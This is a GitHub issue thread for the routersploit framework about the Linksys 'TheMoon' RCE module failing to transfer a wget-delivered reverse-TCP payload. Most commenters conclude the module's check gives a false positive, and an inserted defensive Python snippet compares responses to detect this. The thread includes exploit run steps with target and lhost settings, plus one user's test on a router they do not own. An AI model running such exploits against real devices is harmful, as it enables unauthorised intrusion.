threat9 / routersploit

Exploitation Framework for Embedded Devices

Could not set up HTTP server on lhost / can't transfer payload #550

Open jansramek opened 5 years ago

jansramek commented 5 years ago

Current Behavior

cmd (MIPSLE Reverse TCP) > run
[*] Using wget method
[-] Could not set up HTTP Server on 192.168.0.102:5555
[-] Exploit failed to transfer payload

Expected Behavior

Steps to Reproduce (for bugs)

  1. use exploits/routers/linksys/eseries_themoon_rce
  2. set target 192.168.0.1
  3. run
  4. set payload reverse_tcp
  5. set lhost 192.168.0.102
  6. run

Environment

stefan9999991 commented 5 years ago

Have the exact same problem! Please notify me if you find something that helps you.

hackmybeer commented 5 years ago

Got the same problem, please notify me too (:

stefan9999991 commented 5 years ago

Any solutions yet?

GianisTsol commented 5 years ago

Also having it :( Notify me when you find a solution.

Keskebeu commented 5 years ago

Same here.

Bbcomb commented 5 years ago

same lol.

Keskebeu commented 5 years ago

I believe this has to do with the type of Linksys router. It's probably a different type of Linksys router.

KentuckyJohnOliver commented 5 years ago

Exact same here. However I can verify the router I'm scanning is NOT a Linksys router.

jansramek commented 5 years ago

> I believe this has to do with the type of Linksys router. It's probably a different type of Linksys router.

Same on a non-Linksys router. It is probably a false positive.

Keskebeu commented 5 years ago

Could be the case. The router I tried it on was a Linksys router. When I used it on a Motorola router nothing came up. I also read somewhere else that it had to do with that and we are expected to change the code based on the Linksys router.

It could be a router which is made by Linksys or uses Linksys components and/or software, just a different name.

On Tue, Jan 15, 2019, 6:21 AM jansramek <notifications@github.com> wrote:

> > I believe this has to do with the type of Linksys router. It's probably a different type of Linksys router.
>
> Same on non Linksys router. It is probably false positives.

ghost commented 5 years ago

same here

sudo-jake commented 5 years ago

I'm also having that issue, but I think I might have found a fix (keyword "might"): make sure apache is started by typing "sudo service apache2 start".

Hayzr commented 5 years ago

Looks like a false positive. If you go through the logs it uses an HTTP GET for the tmUnblock.cgi file. It marks a successful GET as Vulnerable.

You can wget the file yourself:
wget /tmUnblock.cgi
Compare it to the source code for the login screen. In my case, they're the same.
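Added example (not part of this thread and not routersploit's code): the comparison described in the comment above, written as a check that treats a 200 for /tmUnblock.cgi as meaningless when the same page also comes back for `/` or for a random path. The `fetch(path) -> (status, body)` interface, the function names and the three sample devices are assumptions constructed for illustration.

```python
import hashlib
import re
import secrets

def fingerprint(body: bytes) -> str:
    """Hash a body with whitespace collapsed so formatting noise is ignored."""
    return hashlib.sha256(re.sub(rb"\s+", b" ", body).strip()).hexdigest()

def classify_probe(fetch, path="/tmUnblock.cgi"):
    """Classify a GET-based finding. fetch(path) -> (status, body) is supplied
    by the caller (hypothetical interface). Returns:
      'absent'    - the path does not answer 200
      'catch-all' - same page as '/' or as a random path: the 200 proves nothing
      'distinct'  - the path has its own content, so the finding merits review
    """
    status, body = fetch(path)
    if status != 200:
        return "absent"
    probe_fp = fingerprint(body)
    # Baselines: the landing/login page and a path that cannot exist.
    for baseline in ("/", "/" + secrets.token_hex(8) + ".cgi"):
        b_status, b_body = fetch(baseline)
        if b_status == 200 and fingerprint(b_body) == probe_fp:
            return "catch-all"
    return "distinct"

# Constructed sample devices (not captured from real hardware).
LOGIN = b"<html><title>Login</title><form action='/login'></form></html>"

def login_everywhere(path):
    """Serves the login page for every URL, as described in the comment above."""
    return 200, LOGIN

def has_own_cgi(path):
    """Answers only known paths; the CGI body is a placeholder."""
    pages = {"/": LOGIN, "/tmUnblock.cgi": b"<html>constructed CGI page</html>"}
    return (200, pages[path]) if path in pages else (404, b"Not Found")

def no_cgi(path):
    """Has a login page but no tmUnblock.cgi at all."""
    return (200, LOGIN) if path == "/" else (404, b"Not Found")

if __name__ == "__main__":
    for device in (login_everywhere, has_own_cgi, no_cgi):
        print(device.__name__, "->", classify_probe(device))
```

A login page that embeds a per-request token will not hash identically across requests; in that case compare a similarity ratio rather than an exact hash.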

HarizDharma commented 4 years ago

Same here. I got this problem, how to solve?

evoke0 commented 4 years ago

I also have the same problem. Although it marks the router as vulnerable, I can confirm that the router is not Linksys, so it might be a false positive, but I wonder why the HTTP server error occurs. Setting up the server on lhost shouldn't be related to the payload working or not against the router. Any thoughts on this?

The fact of this issue being open since 2018 is not a good sign.

ghost commented 4 years ago

i get this too

sealoomaan commented 3 years ago

Anybody here found the solution ?

l014 commented 3 years ago

Same error, but if I set a port that the router is using for other TCP/UDP connections the payload is being handled somehow, I think anyway.

mipsle

The router is a Huawei DG8245W2-10, not mine so I don't know fw v, the owner has forgotten the admin passw.

Here is the handshake - payload scr->wireshark

At first glance the response looked like a normal POST to /tmUnblock.cgi
....but there is something

payload

gabriel2018-27 commented 3 years ago

heeeeeeeelp!!

blackerr commented 3 years ago

any solution?

OmiceyO commented 3 years ago

2021, still doesn't work. Probably, as the guy said above, it's a "False Positive".

cm038 commented 3 years ago

> any solution?

I have the same problem

cm038 commented 3 years ago

Nobody ?

cm038 commented 3 years ago

Hey... When I change the lport it comes a step closer

cmd (MIPSLE Bind TCP) > set lport 8080
lport => 8080
cmd (MIPSLE Bind TCP) > run

[*] Using wget method
[*] Using wget to download binary
[-] Exploit failed to transfer payload

overtimepog commented 3 years ago

Yeah, still getting this, no idea what's going on, false positive seems the most likely.

imansour12 commented 3 years ago

getting this too

andvargrad commented 2 years ago

I have same problem

mariosacaj commented 2 years ago

I think the "Could not set up HTTP server on lhost" message is displayed because it attempts at opening a new connection on the specified port without killing the first one, or something like this.

Codeiology commented 1 year ago

I tried the checker for this exploitation module on a non-Linksys router, and it showed up as vulnerable, but had the same issue. I think we can confirm this is a false positive now.

Dlazder commented 9 months ago

I have the same problem(

Munkhbadral1 commented 7 months ago

same

cankaygisiz commented 6 months ago

Any update for this problem?

iqnnis commented 3 months ago

had this also

Mohamed3bdelwahab commented 1 month ago

The issue still exists. Are there any working methods?